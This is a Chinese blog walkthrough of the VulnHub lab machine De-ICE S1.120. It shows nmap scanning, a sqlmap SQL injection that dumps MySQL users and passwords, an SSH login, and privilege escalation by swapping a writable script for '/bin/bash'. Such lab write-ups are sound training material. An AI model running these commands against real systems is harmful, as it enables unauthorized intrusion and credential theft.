De-ICE_S1.120

最新推荐文章于 2024-09-02 16:32:30 发布
最新推荐文章于 2024-09-02 16:32:30 发布
阅读量142 收藏 3
点赞数 3
分类专栏: vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/140782703
版权

一、信息收集

1、主机发现

nmap 192.168.1.0/24

2、端口扫描

nmap 192.168.1.120 -p-

二、漏洞探测

  1. 访问ip地址,点击Add Product,发现提交页面

  1. 填写信息后点击View Products查看,选择刚才添加的产品,提交

  1. 可以发现URL为http://192.168.1.120/products.php?id=1,可能存在SQL注入,利用sqlmap
python3 sqlmap.py -u "http://192.168.1.120/products.php?id=1" --batch

  1. 获取所有用户和密码
python3 sqlmap.py -u "http://192.168.1.120/products.php?id=1" --batch -D mysql --users --passwords

  1. 使用ccoffee用户进行ssh远程连接

三、提权

  1. 寻找suid文件,用户 ccoffee 位于路径 /home/ccoffee/scripts/getlogs.sh 下,可以执行 getlogs.sh 命令内的任何命令
find / -perm -u=s -type f 2>/dev/null

  1. getlogs.sh 移动到 getlogs.sh.bak,然后创建一个新的 getlogs.sh 文件以生成 shell
mv getlogs.sh getlogs.sh.bak
echo "/bin/bash" >  getlogs.sh
chmod 777 getlogs.sh

  1. 执行该文件,执行whoami,id发现提权成功

花椒椒椒
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全售前入门06安全服务——基线检测服务方案
打工人
08-30 1517
安全基线检查可以帮助单位认清自身风险现状和漏洞隐患,使业务系统的风险维持在可控范围内。根本目的是保障业务系统的安全,是为了避免人为疏忽或错误,或使用默认的安全配置,给业务系统安全造成风险而制定的安全检查标准,并且采取必要的安全检查措施,使业务系统达到相对的安全指标要求。
NTFS安全权限和文件共享
m0_64139836的博客
08-28 434
FAT32和exFAT支持单个文件不超过4G的文件;
【网络安全】服务基础第一阶段——第五节:Windows系统管理基础---- DHCP部署与安全
goldfish8848的博客
08-29 916
DHCP服务器不仅可以⾃动分配IP地址给⽹络中的设备,还可以进⾏⾼级的管理和配置,以确保⽹络的⾼效运⾏和安全。下⾯是⼀些关键的管理策略和操作步骤:1. 设置地址池(Scope Configuration)DHCP服务器通过所谓的“作⽤域”来管理IP地址池。每个作⽤域定义了⼀系列的IP地址,这些地址可以⾃动分配给⽹络中的客户端。
【软件逆向】第27课,软件逆向安全工程师之(二)寄存器寻址,每天5分钟学习逆向吧!
DvlpNews
09-02 421
寄存器寻址是汇编语言中的一种寻址方式,在这种方式中,操作数位于CPU的寄存器中。寄存器是CPU内部的高速存储位置,用于快速访问数据。
医院建筑的电气设计——保障医疗质量与安全的坚固基石
acrel002的博客
08-28 556
特别是那些与患者生命息息相关的1、2类场所,如急诊抢救室、手术室、重症监护室等,其供电系统更是被赋予了“特别重要负荷”的标签,要求在极短的时间内恢复供电,以确保医疗活动的连续性和患者的安全。随着一批批新建医院及既有医院的华丽蜕变,从社区医院到综合医院,再到医疗城、医疗集聚区的崛起,不仅彰显了政府对民生健康的深切关怀,也预示着我国医疗体系正迈向智能化、高效化的新时代。医院,作为生命与健康的守护者,其内部布满了各式各样的精密医疗设备与电子仪器,这些设备的稳定运行高度依赖于稳定、可靠的电力供应。
网络安全售前入门07安全服务——主机漏洞扫描服务方案
打工人
08-30 682
漏洞扫描服务主要针对系统层、网络层、数据层、应用层进行安全评估,即对客户使用系统的运行环境进行安全评估。
【网络安全】服务基础第一阶段——第六节:Windows系统管理基础---- DNS部署与安全
goldfish8848的博客
08-29 983
简单来说,⼀条域名的DNS记录会在本地有两种缓存:浏览器缓存和操作系统(OS)缓存。在浏览器中访问的时候,会优先访问浏览器缓存,如果未命中则访问OS缓存,最后再访问DNS服务器(⼀般是ISP提供),然后DNS服务器会递归式的查找域名记录,然后返回。DNS记录会有⼀个ttl值(time to live),单位是秒,意思是这个记录最⼤有效期是多少。经过实验,OS缓存会参考ttl值,但是不完全等于ttl值,⽽浏览器DNS缓存的时间跟ttl值⽆关,每种浏览器都使⽤⼀个固定值。
突发性网络攻击的安全挑战分析
persist213的博客
08-28 588
根据学者的统计,美国主要媒体对突发性网络攻击 ( 尤其是“网络珍珠港”) 的报道于 2011-继 2010 年遭受震网病毒攻击之后,伊朗在 2018 年又一次受到了震网病毒的攻击,并且攻击的严。2013 年之间呈飙升的趋势,而这正是因为伊朗对美国和其波斯湾盟国进行了一系列的网络攻击,正是鉴于这样一种权衡,美国的安全战略才不断地强调对突发性网络攻击的预防。网络战争的新兴形式,对于世界来说仍是国家安全领域的新问题,对网络安全治理带来了不可忽视。根据目前的世界格局,国与国之间的军事实力是完全不对称的,尤其。
实时计算:Apache Flink:Flink与Kafka集成实现事件驱动架构.docx
09-02
实时计算:Apache Flink:Flink与Kafka集成实现事件驱动架构.docx
移动软件开发实验五:高校新闻
09-02
移动软件开发实验五:高校新闻
分布式存储系统:Google Cloud Storage:GoogleCloudStorage架构解析.docx
09-02
分布式存储系统:Google Cloud Storage:GoogleCloudStorage架构解析.docx
基于现有explorer文件资源管理,实现跨平台告诉多标签页文件资源管理器,类似360文件管理器等,还处于起步阶段
09-02
基于现有explorer文件资源管理,实现跨平台告诉多标签页文件资源管理器,类似360文件管理器等,还处于起步阶段
关于进程之间的通信IPC,管道,信号的学习
09-02
进程间通信(IPC)是操作系统中用于让不同进程之间相互通信的机制。管道是一种半双工的通信方式,数据只能单向流动,而且只能在具有亲缘关系的进程间使用。信号是在软件层次上对中断机制的一种模拟,是一种异步通信方式。该文章讲述了进程的通信通过管道与信号,以及扩展信号等实现进程间数据的交互。它们涵盖基础知识、代码示例和应用场景,适合初学者学习和参考。这些资源能够帮助你理解相关概念,并在实际开发中运用它们进行有效的进程间通信。
我的第二个练手项目:(django1.9+python2.7)慕学网在线教育平台(后端部分).zip
09-02
我的第二个练手项目:(django1.9+python2.7)慕学网在线教育平台(后端部分)
Android开发实战经典-041105-传感器视频教程.zip
09-02
Android开发实战经典_041105_传感器视频教程.zip
try except finally的用法.doc
09-02
try except finally的用法.doc
消息队列:ActiveMQ:ActiveMQ消息过滤与选择.docx
09-02
消息队列:ActiveMQ:ActiveMQ消息过滤与选择.docx
小程序-电梯品牌商城(源码).zip
最新发布
09-02
小程序-电梯品牌商城(源码).zip
大数据处理框架:Storm:大数据处理框架概论.docx
09-02
大数据处理框架:Storm:大数据处理框架概论.docx
SELECT DISTINCT IceCream.name FROM IceCream INNER JOIN Tx_IceCream ON IceCream.icecream_id = Tx_IceCream.icecream_id INNER JOIN Tx ON Tx_IceCream.tx_id = Tx.tx_id WHERE Tx.month = 3;可以改成用left join 吗
06-07
是的,可以将上述 SQL 查询语句中的 INNER JOIN 改为 LEFT JOIN,如下所示: ``` SELECT DISTINCT IceCream.name FROM IceCream LEFT JOIN Tx_IceCream ON IceCream.icecream_id = Tx_IceCream.icecream_id LEFT JOIN Tx ON Tx_IceCream.tx_id = Tx.tx_id AND Tx.month = 3; ``` 这样的话,会返回所有的 IceCream 记录,即使它们没有与 Tx_IceCream 或 Tx 表中的记录匹配。同时,对于 Tx 表中月份不为 3 的记录,它们与 Tx_IceCream 表中的记录也会匹配成功,但由于 Tx 表中的筛选条件,它们最终不会被包含在结果中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值